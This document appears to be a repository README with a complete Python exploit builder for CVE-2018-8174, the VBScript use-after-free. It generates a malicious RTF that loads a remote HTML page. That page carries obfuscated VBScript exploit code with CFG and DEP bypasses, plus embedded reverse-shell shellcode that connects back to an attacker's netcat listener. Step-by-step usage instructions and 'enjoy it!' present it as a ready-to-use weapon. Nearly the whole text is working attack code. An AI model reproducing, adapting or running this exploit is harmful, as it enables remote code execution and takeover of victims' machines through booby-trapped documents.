CVE-2018-8174 EXP 0day python

usage: CVE-2018-8174.py [-h] -u URL -o OUTPUT [-i IP] [-p PORT]

Exploit for CVE-2018-8174

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     exp url
  -o OUTPUT, --output OUTPUT
                        Output exploit rtf
  -i IP, --ip IP        ip for netcat
  -p PORT, --port PORT  port for netcat

eg:

  1. python CVE-2018-8174.py -u http://1.1.1.1/exploit.html -o exp.rtf -i 2.2.2.2 -p 4444
  2. put exploit.html on your server (1.1.1.1)
  3. netcat listen on [any] 4444 (2.2.2.2)

enjoy it !

POC:

```python
import argparse
import struct

SampleRTF = R"""{\rtf1\ansi\ansicpg1252\deff0\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
{\*\generator Msftedit 5.41.21.2510;}\viewkind4\uc1\pard\sa200\sl276\slmult1\lang9\f0\fs22{\object\objautlink\objupdate\rsltpict\objw4321\objh4321{\*\objclass htmlfile}{\*\objdata 0105000002000000090000004f4c45324c696e6b000000000000000000000a0000
d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffdfffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000003000000000000c000000000000046000000000000000000000000903b
beae04f2d30103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000
000000000000000000000000f20000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000
0000000000000000000004000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000
000000000000000000000000050000008100000000000000010000000200000003000000fefffffffeffffff0600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020900000001000000000000002a0000000403000000000000c0000000000000460200000021000c0000005f31353838343937393534000000000080000000e0c9ea79f9bace118c8200aa004ba90b68000000
UNICODE_URL
000000795881f43b1d7f48af2c825dc485276300000000a5ab0000ffffffff20693325f903cf118fd000aa00686f1300000000ffffffff0000
000000000000e05dd6ab04f2d30100000000000000000000000000000000000000000000100203000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002700
NORMAL_URL
0000bbbbcccc2700
UNICODE_URL
0000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000d0000004d45544146494c45504943540000000000000000005e0000000800000000000000
0100090000032b00000000000500000000000400000003010800050000000b0200000000050000000c0200000000030000001e00050000000d0200000000050000000d0200000000040000002701ffff030000000000}
}\par
}
"""

SampleHTML = R"""
<!doctype html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="x-ua-compatible" content="IE=10">
<meta http-equiv="Expires" content="0">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-control" content="no-cache">
<meta http-equiv="Cache" content="no-cache">
</head>
<body>
<script language="vbscript">
Dim lIIl
Dim IIIlI(6),IllII(6)
Dim IllI
Dim IIllI(40)
Dim lIlIIl,lIIIll
Dim IlII
Dim llll,IIIIl
Dim llllIl,IlIIII
Dim NtContinueAddr,VirtualProtectAddr
IlII=195948557
lIlIIl=Unescape("%u0001%u0880%u0001%u0000%u0000%u0000%u0000%u0000%uffff%u7fff%u0000%u0000")
lIIIll=Unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000")
IllI=195890093
Function IIIII(Domain)
    lIlII=0
    IllllI=0
    IIlIIl=0
    Id=CLng(Rnd*1000000)
    lIlII=CLng((&h27d+8231-&H225b)*Rnd)Mod (&h137d+443-&H152f)+(&h1c17+131-&H1c99)
    If(Id+lIlII)Mod (&h5c0+6421-&H1ed3)=(&h10ba+5264-&H254a) Then
        lIlII=lIlII-(&h86d+6447-&H219b)
    End If
    IllllI=CLng((&h2bd+6137-&H1a6d)*Rnd)Mod (&h769+4593-&H1940)+(&h1a08+2222-&H2255)
    IIlIIl=CLng((&h14e6+1728-&H1b5d)*Rnd)Mod (&hfa3+1513-&H1572)+(&h221c+947-&H256e)
    IIIII=Domain &"?" &Chr(IllllI) &"=" &Id &"&" &Chr(IIlIIl) &"=" &lIlII
End Function
Function lIIII(ByVal lIlIl)
    IIll=""
    For index=0 To Len(lIlIl)-1
        IIll=IIll &lIlI(Asc(Mid(lIlIl,index+1,1)),2)
    Next
    IIll=IIll &"00"
    If Len(IIll)/(&h15c6+3068-&H21c0) Mod (&h1264+2141-&H1abf)=(&hc93+6054-&H2438) Then
        IIll=IIll &"00"
    End If
    For IIIl=(&h1a1a+3208-&H26a2) To Len(IIll)/(&h1b47+331-&H1c8e)-(&h14b2+4131-&H24d4)
        lIIIlI=Mid(IIll,IIIl*(&h576+1268-&Ha66)+(&ha64+6316-&H230f),(&ha49+1388-&Hfb3))
        lIlIll=Mid(IIll,IIIl*(&hf82+3732-&H1e12)+(&h210+2720-&Hcaf)+(&h4fa+5370-&H19f2),(&hf82+5508-&H2504))
        lIIII=lIIII &"%u" &lIlIll &lIIIlI
    Next
End Function
Function lIlI(ByVal Number,ByVal Length)
    IIII=Hex(Number)
    If Len(IIII)<Length Then
        IIII=String(Length-Len(IIII),"0") &IIII    'pad allign with zeros 
    Else
        IIII=Right(IIII,Length)
    End If
    lIlI=IIII
End Function
Function GetUint32(lIII)
    Dim value
    llll.mem(IlII+8)=lIII+4
    llll.mem(IlII)=8        'type string
    value=llll.P0123456789
    llll.mem(IlII)=2
    GetUint32=value
End Function
Function IllIIl(lIII)
    IllIIl=GetUint32(lIII) And (131071-65536)
End Function
Function lllII(lIII)
    lllII=GetUint32(lIII)  And (&h17eb+1312-&H1c0c)
End Function
Sub llllll
End Sub
Function GetMemValue
    llll.mem(IlII)=(&h713+3616-&H1530)
    GetMemValue=llll.mem(IlII+(&h169c+712-&H195c))
End Function
Sub SetMemValue(ByRef IlIIIl)
    llll.mem(IlII+(&h715+3507-&H14c0))=IlIIIl
End Sub
Function LeakVBAddr
    On Error Resume Next
    Dim lllll
    lllll=llllll
    lllll=null
    SetMemValue lllll
    LeakVBAddr=GetMemValue()
End Function
Function GetBaseByDOSmodeSearch(IllIll)
    Dim llIl
    llIl=IllIll And &hffff0000
    Do While GetUint32(llIl+(&h748+4239-&H176f))<>544106784 Or GetUint32(llIl+(&ha2a+7373-&H268b))<>542330692
        llIl=llIl-65536
    Loop
    GetBaseByDOSmodeSearch=llIl
End Function
Function StrCompWrapper(lIII,llIlIl)
    Dim lIIlI,IIIl
    lIIlI=""
    For IIIl=(&ha2a+726-&Hd00) To Len(llIlIl)-(&h2e1+5461-&H1835)
        lIIlI=lIIlI &Chr(lllII(lIII+IIIl))
    Next
    StrCompWrapper=StrComp(UCase(lIIlI),UCase(llIlIl))
End Function
Function GetBaseFromImport(base_address,name_input)
    Dim import_rva,nt_header,descriptor,import_dir
    Dim IIIIII
    nt_header=GetUint32(base_address+(&h3c))
    import_rva=GetUint32(base_address+nt_header+&h80)
    import_dir=base_address+import_rva
    descriptor=0
    Do While True
        Dim Name
        Name=GetUint32(import_dir+descriptor*(&h14)+&hc)
        If Name=0 Then
            GetBaseFromImport=&hBAAD0000
            Exit Function
        Else
            If StrCompWrapper(base_address+Name,name_input)=0 Then
                Exit Do
            End If
        End If
        descriptor=descriptor+1
    Loop
    IIIIII=GetUint32(import_dir+descriptor*(&h14)+&h10)
    GetBaseFromImport=GetBaseByDOSmodeSearch(GetUint32(base_address+IIIIII))
End Function
Function GetProcAddr(dll_base,name)
    Dim p,export_dir,index
    Dim function_rvas,function_names,function_ordin
    Dim Illlll
    p=GetUint32(dll_base+&h3c)
    p=GetUint32(dll_base+p+&h78)
    export_dir=dll_base+p
    function_rvas=dll_base+GetUint32(export_dir+&h1c)
    function_names=dll_base+GetUint32(export_dir+&h20)
    function_ordin=dll_base+GetUint32(export_dir+&h24)
    index=0
    Do While True
        Dim lllI
        lllI=GetUint32(function_names+index*4)
        If StrCompWrapper(dll_base+lllI,name)=0 Then
            Exit Do
        End If
        index=index+1
    Loop
    Illlll=IllIIl(function_ordin+index*2)
    p=GetUint32(function_rvas+Illlll*4)
    GetProcAddr=dll_base+p
End Function
Function GetShellcode()
    IIlI=Unescape("%u0000%u0000%u0000%u0000") &Unescape("REPLACE_SHELLCODE_HERE" &lIIII(IIIII("")))
    IIlI=IIlI & String((&h80000-LenB(IIlI))/2,Unescape("%u4141"))
    GetShellcode=IIlI
End Function
Function EscapeAddress(ByVal value)
    Dim High,Low
    High=lIlI((value And &hffff0000)/&h10000,4)
    Low=lIlI(value And &hffff,4)
    EscapeAddress=Unescape("%u" &Low &"%u" &High)
End Function
Function lIllIl
    Dim IIIl,IlllI,IIlI,IlIII,llllI,llIII,lIllI
    IlllI=lIlI(NtContinueAddr,8)
    IlIII=Mid(IlllI,1,2)
    llllI=Mid(IlllI,3,2)
    llIII=Mid(IlllI,5,2)
    lIllI=Mid(IlllI,7,2)
    IIlI=""
    IIlI=IIlI &"%u0000%u" &lIllI &"00"
    For IIIl=1 To 3
        IIlI=IIlI &"%u" &llllI &llIII
        IIlI=IIlI &"%u" &lIllI &IlIII
    Next
    IIlI=IIlI &"%u" &llllI &llIII
    IIlI=IIlI &"%u00" &IlIII
    lIllIl=Unescape(IIlI)
End Function
Function WrapShellcodeWithNtContinueContext(ShellcodeAddrParam) 'bypass cfg
    Dim IIlI
    IIlI=String((100334-65536),Unescape("%u4141"))
    IIlI=IIlI &EscapeAddress(ShellcodeAddrParam)
    IIlI=IIlI &EscapeAddress(ShellcodeAddrParam)
    IIlI=IIlI &EscapeAddress(&h3000)
    IIlI=IIlI &EscapeAddress(&h40)
    IIlI=IIlI &EscapeAddress(ShellcodeAddrParam-8)
    IIlI=IIlI &String(6,Unescape("%u4242"))
    IIlI=IIlI &lIllIl()
    IIlI=IIlI &String((&h80000-LenB(IIlI))/2,Unescape("%u4141"))
    WrapShellcodeWithNtContinueContext=IIlI
End Function
Function ExpandWithVirtualProtect(lIlll)
    Dim IIlI
    Dim lllllI
    lllllI=lIlll+&h23
    IIlI=""
    IIlI=IIlI &EscapeAddress(lllllI)
    IIlI=IIlI &String((&hb8-LenB(IIlI))/2,Unescape("%4141"))
    IIlI=IIlI &EscapeAddress(VirtualProtectAddr)
    IIlI=IIlI &EscapeAddress(&h1b)
    IIlI=IIlI &EscapeAddress(0)
    IIlI=IIlI &EscapeAddress(lIlll)
    IIlI=IIlI &EscapeAddress(&h23)
    IIlI=IIlI &String((&400-LenB(IIlI))/2,Unescape("%u4343"))
    ExpandWithVirtualProtect=IIlI
End Function
Sub ExecuteShellcode
    llll.mem(IlII)=&h4d 'DEP bypass
    llll.mem(IlII+8)=0
    msgbox(IlII)        'VT replaced
End Sub
Class cla1
Private Sub Class_Terminate()
    Set IIIlI(IllI)=lIIl((&h1078+5473-&H25d8))
    IllI=IllI+(&h14b5+2725-&H1f59)
    lIIl((&h79a+3680-&H15f9))=(&h69c+1650-&Hd0d)
End Sub
End Class
Class cla2
Private Sub Class_Terminate()
    Set IllII(IllI)=lIIl((&h15b+3616-&Hf7a))
    IllI=IllI+(&h880+542-&Ha9d)
    lIIl((&h1f75+342-&H20ca))=(&had3+3461-&H1857)
End Sub
End Class
Class IIIlIl
End Class
Class llIIl
Dim mem
Function P
End Function
Function SetProp(Value)
    mem=Value
    SetProp=0
End Function
End Class
Class IIIlll
Dim mem
Function P0123456789
    P0123456789=LenB(mem(IlII+8))
End Function
Function SPP
End Function
End Class
Class lllIIl
Public Default Property Get P
Dim llII
P=174088534690791e-324
For IIIl=(&h7a0+4407-&H18d7) To (&h2eb+1143-&H75c)
    IIIlI(IIIl)=(&h2176+711-&H243d)
Next
Set llII=New IIIlll
llII.mem=lIlIIl
For IIIl=(&h1729+3537-&H24fa) To (&h1df5+605-&H204c)
    Set IIIlI(IIIl)=llII
Next
End Property
End Class
Class llllII
Public Default Property Get P
Dim llII
P=636598737289582e-328
For IIIl=(&h1063+2314-&H196d) To (&h4ac+2014-&Hc84)
    IllII(IIIl)=(&h442+2598-&He68)
Next
Set llII=New IIIlll
llII.mem=lIIIll
For IIIl=(&h7eb+3652-&H162f) To (&h3e8+1657-&Ha5b)
    Set IllII(IIIl)=llII
Next
End Property
End Class
Set llllIl=New lllIIl
Set IlIIII=New llllII
Sub UAF
    For IIIl=(&hfe8+3822-&H1ed6) To (&h8b+8633-&H2233)
        Set IIllI(IIIl)=New IIIlIl
    Next
    For IIIl=(&haa1+6236-&H22e9) To (&h1437+3036-&H1fed)
        Set IIllI(IIIl)=New llIIl
    Next
    IllI=0
    For IIIl=0 To 6
        ReDim lIIl(1)
        Set lIIl(1)=New cla1
        Erase lIIl
    Next
    Set llll=New llIIl
    IllI=0
    For IIIl=0 To 6
        ReDim lIIl(1)
        Set lIIl(1)=New cla2
        Erase lIIl
    Next
    Set IIIIl=New llIIl
End Sub
Sub InitObjects
    llll.SetProp(llllIl)
    IIIIl.SetProp(IlIIII)
    IlII=IIIIl.mem
End Sub
Sub StartExploit
    UAF
    InitObjects
    vb_adrr=LeakVBAddr()
    // Alert "CScriptEntryPointObject Leak: 0x" & Hex(vb_adrr) & vbcrlf & "VirtualTable address: 0x" & Hex(GetUint32(vb_adrr))
    vbs_base=GetBaseByDOSmodeSearch(GetUint32(vb_adrr))
    // Alert "VBScript Base: 0x" & Hex(vbs_base) 
    msv_base=GetBaseFromImport(vbs_base,"msvcrt.dll")
    // Alert "MSVCRT Base: 0x" & Hex(msv_base) 
    krb_base=GetBaseFromImport(msv_base,"kernelbase.dll")
    // Alert "KernelBase Base: 0x" & Hex(krb_base) 
    ntd_base=GetBaseFromImport(msv_base,"ntdll.dll")
    // Alert "Ntdll Base: 0x" & Hex(ntd_base) 
    VirtualProtectAddr=GetProcAddr(krb_base,"VirtualProtect")
    // Alert "KernelBase!VirtualProtect Address 0x" & Hex(VirtualProtectAddr) 
    NtContinueAddr=GetProcAddr(ntd_base,"NtContinue")
    // Alert "KernelBase!VirtualProtect Address 0x" & Hex(NtContinueAddr) 
    SetMemValue GetShellcode()
    ShellcodeAddr=GetMemValue()+8
    // Alert "Shellcode Address 0x" & Hex(ShellcodeAddr) 
    SetMemValue WrapShellcodeWithNtContinueContext(ShellcodeAddr)
    lIlll=GetMemValue()+69596
    SetMemValue ExpandWithVirtualProtect(lIlll)
    llIIll=GetMemValue()
    // Alert "Executing Shellcode"
    ExecuteShellcode
End Sub
StartExploit
</script>
</body>
</html>
"""

reverseip = '1.1.1.1'
reverseport = 4444

def create_rtf_file(url,filename):
    NORMAL_URL = url.encode('hex')+"0"*(78-len(url.encode('hex')))
    UNICODE_URL = "00".join("{:02x}".format(ord(c)) for c in url)
    if len(UNICODE_URL) < 154:
        print 'UNICODE_URL len %d , need to pad ...' % len(UNICODE_URL)
        UNICODE_URL = UNICODE_URL+"0"*(154 - len(UNICODE_URL))
    res = SampleRTF.replace('NORMAL_URL',NORMAL_URL).replace('UNICODE_URL',UNICODE_URL)
    f = open(filename, 'w')
    f.write(res)
    f.close()
    print "Generated "+filename+" successfully"


def rev_shellcode(ip,port):
    ip = [int(i) for i in ip.split(".")]
    buf =  ""
    buf += "\xfc\xe9\x8a\x00\x00\x00\x5d\x83\xc5\x0b\x81\xc4\x70"
    buf += "\xfe\xff\xff\x8d\x54\x24\x60\x52\x68\xb1\x4a\x6b\xb1"
    buf += "\xff\xd5\x8d\x44\x24\x60\xeb\x5c\x5e\x8d\x78\x60\x57"
    buf += "\x50\x31\xdb\x53\x53\x68\x04\x00\x00\x08\x53\x53\x53"
    buf += "\x56\x53\x68\x79\xcc\x3f\x86\xff\xd5\x85\xc0\x74\x59"
    buf += "\x6a\x40\x80\xc7\x10\x53\x53\x31\xdb\x53\xff\x37\x68"
    buf += "\xae\x87\x92\x3f\xff\xd5\x54\x68\x44\x01\x00\x00\xeb"
    buf += "\x39\x50\xff\x37\x68\xc5\xd8\xbd\xe7\xff\xd5\x53\x53"
    buf += "\x53\x8b\x4c\x24\xfc\x51\x53\x53\xff\x37\x68\xc6\xac"
    buf += "\x9a\x79\xff\xd5\xe9\x41\x01\x00\x00\xe8\x9f\xff\xff"
    buf += "\xff\x72\x75\x6e\x64\x6c\x6c\x33\x32\x2e\x65\x78\x65"
    buf += "\x00\xe8\x71\xff\xff\xff\xe8\xc2\xff\xff\xff\xfc\xe8"
    buf += "\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
    buf += "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26"
    buf += "\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01"
    buf += "\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c"
    buf += "\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b"
    buf += "\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac"
    buf += "\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b"
    buf += "\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c"
    buf += "\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44"
    buf += "\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a"
    buf += "\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73"
    buf += "\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
    buf += "\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5"
    buf += "\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0"
    buf += "\xff\xd5\x97\x6a\x05\x68"+struct.pack("!4B",ip[0],ip[1],ip[2],ip[3])+"\x68\x02\x00"
    buf += struct.pack("!H",port)+"\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
    buf += "\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0"
    buf += "\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57"
    buf += "\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44"
    buf += "\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50"
    buf += "\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc"
    buf += "\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08"
    buf += "\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95"
    buf += "\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05"
    buf += "\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"

    return buf.encode("hex")

def gen_shellcode(s):
    n = len(s)
    i = 0
    strs = ''
    if n % 4 == 2:
        s=s+'41'
    while i <n:
        strs += '%u'+s[i+2:i+4]+s[i:i+2]
        i+=4
    return strs

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="Exploit for CVE-2018-8174")
    parser.add_argument("-u", "--url", help="exp url", required=True)
    parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)
    parser.add_argument('-i', "--ip", help="ip for netcat", required=False)
    parser.add_argument('-p', "--port", help="port for netcat", required=False)
    args = parser.parse_args()
    url = args.url
    filename = args.output
    create_rtf_file(url,filename)
    if args.ip and args.port:
        ip = str(args.ip)
        port = int(args.port)
        shellcode = gen_shellcode(rev_shellcode(ip,port))
    else:
        shellcode = gen_shellcode(rev_shellcode(reverseip,reverseport))
    res = SampleHTML.replace('REPLACE_SHELLCODE_HERE',shellcode)
    f = open('exploit.html', 'w')
    f.write(res)
    f.close()

    print "!!! Completed !!!"
```
